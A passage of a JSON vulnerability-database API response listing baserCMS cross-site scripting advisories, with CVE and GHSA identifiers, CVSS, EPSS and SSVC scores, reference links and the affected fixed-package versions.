                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:P/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-24T19:22:34Z/"
                        }
                    ],
                    "url": "https://basercms.net/security/JVN_00876083"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N"
                        },
                        {
                            "value": "5.2",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:P/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2024-46996",
                    "reference_id": "CVE-2024-46996",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N"
                        },
                        {
                            "value": "5.2",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:P/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-46996"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-66jv-qrm3-vvfg",
                    "reference_id": "GHSA-66jv-qrm3-vvfg",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://github.com/advisories/GHSA-66jv-qrm3-vvfg"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms/security/advisories/GHSA-66jv-qrm3-vvfg",
                    "reference_id": "GHSA-66jv-qrm3-vvfg",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N"
                        },
                        {
                            "value": "5.2",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:P/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-24T19:22:34Z/"
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms/security/advisories/GHSA-66jv-qrm3-vvfg"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/83045?format=api",
                    "purl": "pkg:composer/baserproject/basercms@5.1.2",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-3new-f12y-8bf9"
                        },
                        {
                            "vulnerability": "VCID-4zw8-truk-pugf"
                        },
                        {
                            "vulnerability": "VCID-7x3n-4c2b-nfbx"
                        },
                        {
                            "vulnerability": "VCID-8buz-nsr9-3yge"
                        },
                        {
                            "vulnerability": "VCID-8ssu-umet-37bk"
                        },
                        {
                            "vulnerability": "VCID-d1sf-cmct-zbh1"
                        },
                        {
                            "vulnerability": "VCID-k5qv-4yp3-zbgf"
                        },
                        {
                            "vulnerability": "VCID-y2sz-c6vb-pkdp"
                        },
                        {
                            "vulnerability": "VCID-zqd4-rdem-jfgk"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.1.2"
                }
            ],
            "aliases": [
                "CVE-2024-46996",
                "GHSA-66jv-qrm3-vvfg"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-mfm9-gsh3-ubg8"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/47109?format=api",
            "vulnerability_id": "VCID-nxrf-64er-xbfx",
            "summary": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')\nbaserCMS is a website development framework. Prior to version 5.0.9, there is a cross-site scripting vulnerability in the content management feature. Version 5.0.9 contains a fix for this vulnerability.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2024-26128",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.02281",
                            "scoring_system": "epss",
                            "scoring_elements": "0.85006",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2024-26128"
                },
                {
                    "reference_url": "https://basercms.net/security/JVN_73283159",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-07-12T15:20:28Z/"
                        }
                    ],
                    "url": "https://basercms.net/security/JVN_73283159"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms/commit/18f426d63e752b4d22c40e9ea8d1f6e692ef601c",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-07-12T15:20:28Z/"
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms/commit/18f426d63e752b4d22c40e9ea8d1f6e692ef601c"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2024-26128",
                    "reference_id": "CVE-2024-26128",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-26128"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-jjxq-m8h3-4vw5",
                    "reference_id": "GHSA-jjxq-m8h3-4vw5",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-jjxq-m8h3-4vw5"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms/security/advisories/GHSA-jjxq-m8h3-4vw5",
                    "reference_id": "GHSA-jjxq-m8h3-4vw5",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-07-12T15:20:28Z/"
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms/security/advisories/GHSA-jjxq-m8h3-4vw5"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/69105?format=api",
                    "purl": "pkg:composer/baserproject/basercms@5.0.9",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-3new-f12y-8bf9"
                        },
                        {
                            "vulnerability": "VCID-4zw8-truk-pugf"
                        },
                        {
                            "vulnerability": "VCID-7x3n-4c2b-nfbx"
                        },
                        {
                            "vulnerability": "VCID-8buz-nsr9-3yge"
                        },
                        {
                            "vulnerability": "VCID-8ssu-umet-37bk"
                        },
                        {
                            "vulnerability": "VCID-d1sf-cmct-zbh1"
                        },
                        {
                            "vulnerability": "VCID-k5qv-4yp3-zbgf"
                        },
                        {
                            "vulnerability": "VCID-khft-xvrw-g3dr"
                        },
                        {
                            "vulnerability": "VCID-mfm9-gsh3-ubg8"
                        },
                        {
                            "vulnerability": "VCID-p695-t9ye-v3ga"
                        },
                        {
                            "vulnerability": "VCID-sqr4-v889-tff8"
                        },
                        {
                            "vulnerability": "VCID-y2sz-c6vb-pkdp"
                        },
                        {
                            "vulnerability": "VCID-zqd4-rdem-jfgk"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.0.9"
                }
            ],
            "aliases": [
                "CVE-2024-26128",
                "GHSA-jjxq-m8h3-4vw5"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-nxrf-64er-xbfx"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/56065?format=api",
            "vulnerability_id": "VCID-p695-t9ye-v3ga",
            "summary": "baserCMS has a Cross-site Scripting (XSS) Vulnerability in Edit Email Form Settings Feature\nXSS vulnerability in Edit Email Form Settings Feature to baserCMS.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2024-46998",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.01064",
                            "scoring_system": "epss",
                            "scoring_elements": "0.7805",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2024-46998"
                },
                {
                    "reference_url": "https://basercms.net/security/JVN_00876083",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N"
                        },
                        {
                            "value": "5.2",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:P/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://basercms.net/security/JVN_00876083"
                },
                {
                    "reference_url": "https://basercms.net/security/JVN_98693329",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N"
                        },
                        {
                            "value": "5.2",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:P/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-24T20:01:19Z/"
                        }
                    ],
                    "url": "https://basercms.net/security/JVN_98693329"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N"
                        },
                        {
                            "value": "5.2",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:P/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2024-46998",
                    "reference_id": "CVE-2024-46998",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N"
                        },
                        {
                            "value": "5.2",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:P/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-46998"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-p3m2-mj3j-j49x",
                    "reference_id": "GHSA-p3m2-mj3j-j49x",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://github.com/advisories/GHSA-p3m2-mj3j-j49x"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms/security/advisories/GHSA-p3m2-mj3j-j49x",
                    "reference_id": "GHSA-p3m2-mj3j-j49x",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N"
                        },
                        {
                            "value": "5.2",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:P/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-24T20:01:19Z/"
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms/security/advisories/GHSA-p3m2-mj3j-j49x"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/83045?format=api",
                    "purl": "pkg:composer/baserproject/basercms@5.1.2",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-3new-f12y-8bf9"
                        },
                        {
                            "vulnerability": "VCID-4zw8-truk-pugf"
                        },
                        {
                            "vulnerability": "VCID-7x3n-4c2b-nfbx"
                        },
                        {
                            "vulnerability": "VCID-8buz-nsr9-3yge"
                        },
                        {
                            "vulnerability": "VCID-8ssu-umet-37bk"
                        },
                        {
                            "vulnerability": "VCID-d1sf-cmct-zbh1"
                        },
                        {
                            "vulnerability": "VCID-k5qv-4yp3-zbgf"
                        },
                        {
                            "vulnerability": "VCID-y2sz-c6vb-pkdp"
                        },
                        {
                            "vulnerability": "VCID-zqd4-rdem-jfgk"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.1.2"
                }
            ],
            "aliases": [
                "CVE-2024-46998",
                "GHSA-p3m2-mj3j-j49x"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-p695-t9ye-v3ga"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/46312?format=api",
            "vulnerability_id": "VCID-pd8c-9d7z-zkhg",
            "summary": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in baserproject/basercms.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2023-43647",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00572",
                            "scoring_system": "epss",
                            "scoring_elements": "0.69062",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2023-43647"
                },
                {
                    "reference_url": "https://basercms.net/security/JVN_24381990",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
                        },
                        {
                            "value": "6.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-06T20:12:52Z/"
                        }
                    ],
                    "url": "https://basercms.net/security/JVN_24381990"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms/commit/eb5977533d05db4f3bb03bd19630b66052799b2e",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
                        },
                        {
                            "value": "6.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-06T20:12:52Z/"
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms/commit/eb5977533d05db4f3bb03bd19630b66052799b2e"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2023-43647",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-43647"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-ggj4-78rm-6xgv",
                    "reference_id": "GHSA-ggj4-78rm-6xgv",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://github.com/advisories/GHSA-ggj4-78rm-6xgv"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms/security/advisories/GHSA-ggj4-78rm-6xgv",
                    "reference_id": "GHSA-ggj4-78rm-6xgv",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
                        },
                        {
                            "value": "6.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-06T20:12:52Z/"
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms/security/advisories/GHSA-ggj4-78rm-6xgv"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/67525?format=api",
                    "purl": "pkg:composer/baserproject/basercms@4.8.0",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-3new-f12y-8bf9"
                        },
                        {
                            "vulnerability": "VCID-4zw8-truk-pugf"
                        },
                        {
                            "vulnerability": "VCID-7x3n-4c2b-nfbx"
                        },
                        {
                            "vulnerability": "VCID-8buz-nsr9-3yge"
                        },
                        {
                            "vulnerability": "VCID-8ssu-umet-37bk"
                        },
                        {
                            "vulnerability": "VCID-d1sf-cmct-zbh1"
                        },
                        {
                            "vulnerability": "VCID-ggv8-3v9t-mfea"
                        },
                        {
                            "vulnerability": "VCID-k5qv-4yp3-zbgf"
                        },
                        {
                            "vulnerability": "VCID-khft-xvrw-g3dr"
                        },
                        {
                            "vulnerability": "VCID-mfm9-gsh3-ubg8"
                        },
                        {
                            "vulnerability": "VCID-nxrf-64er-xbfx"
                        },
                        {
                            "vulnerability": "VCID-p695-t9ye-v3ga"
                        },
                        {
                            "vulnerability": "VCID-sqr4-v889-tff8"
                        },
                        {
                            "vulnerability": "VCID-uedz-j2vn-cbea"
                        },
                        {
                            "vulnerability": "VCID-y2sz-c6vb-pkdp"
                        },
                        {
                            "vulnerability": "VCID-zqd4-rdem-jfgk"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.8.0"
                },
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/67580?format=api",
                    "purl": "pkg:composer/baserproject/basercms@5.0.0",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-3new-f12y-8bf9"
                        },
                        {
                            "vulnerability": "VCID-4zw8-truk-pugf"
                        },
                        {
                            "vulnerability": "VCID-7x3n-4c2b-nfbx"
                        },
                        {
                            "vulnerability": "VCID-8buz-nsr9-3yge"
                        },
                        {
                            "vulnerability": "VCID-8ssu-umet-37bk"
                        },
                        {
                            "vulnerability": "VCID-d1sf-cmct-zbh1"
                        },
                        {
                            "vulnerability": "VCID-k5qv-4yp3-zbgf"
                        },
                        {
                            "vulnerability": "VCID-khft-xvrw-g3dr"
                        },
                        {
                            "vulnerability": "VCID-mfm9-gsh3-ubg8"
                        },
                        {
                            "vulnerability": "VCID-p695-t9ye-v3ga"
                        },
                        {
                            "vulnerability": "VCID-sqr4-v889-tff8"
                        },
                        {
                            "vulnerability": "VCID-y2sz-c6vb-pkdp"
                        },
                        {
                            "vulnerability": "VCID-zqd4-rdem-jfgk"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.0.0"
                }
            ],
            "aliases": [
                "CVE-2023-43647",
                "GHSA-ggj4-78rm-6xgv"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-pd8c-9d7z-zkhg"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/56069?format=api",
            "vulnerability_id": "VCID-sqr4-v889-tff8",
            "summary": "baserCMS has a Cross-site Scripting (XSS) Vulnerability in Blog posts and Contents list Feature\nXSS vulnerability in Blog posts and Contents list Feature to baserCMS.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2024-46994",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.01179",
                            "scoring_system": "epss",
                            "scoring_elements": "0.79112",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2024-46994"
                },
                {
                    "reference_url": "https://basercms.net/security/JVN_00876083",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"
                        },
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-24T19:23:44Z/"
                        }
                    ],
                    "url": "https://basercms.net/security/JVN_00876083"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2024-46994",
                    "reference_id": "CVE-2024-46994",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-46994"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-wrjc-fmfq-w3jr",
                    "reference_id": "GHSA-wrjc-fmfq-w3jr",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://github.com/advisories/GHSA-wrjc-fmfq-w3jr"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms/security/advisories/GHSA-wrjc-fmfq-w3jr",
                    "reference_id": "GHSA-wrjc-fmfq-w3jr",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"
                        },
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-24T19:23:44Z/"
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms/security/advisories/GHSA-wrjc-fmfq-w3jr"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/83045?format=api",
                    "purl": "pkg:composer/baserproject/basercms@5.1.2",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-3new-f12y-8bf9"
                        },
                        {
                            "vulnerability": "VCID-4zw8-truk-pugf"
                        },
                        {
                            "vulnerability": "VCID-7x3n-4c2b-nfbx"
                        },
                        {
                            "vulnerability": "VCID-8buz-nsr9-3yge"
                        },
                        {
                            "vulnerability": "VCID-8ssu-umet-37bk"
                        },
                        {
                            "vulnerability": "VCID-d1sf-cmct-zbh1"
                        },
                        {
                            "vulnerability": "VCID-k5qv-4yp3-zbgf"
                        },
                        {
                            "vulnerability": "VCID-y2sz-c6vb-pkdp"
                        },
                        {
                            "vulnerability": "VCID-zqd4-rdem-jfgk"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.1.2"
                }
            ],
            "aliases": [
                "CVE-2024-46994",
                "GHSA-wrjc-fmfq-w3jr"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-sqr4-v889-tff8"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/46308?format=api",
            "vulnerability_id": "VCID-u16w-rbuk-ybfs",
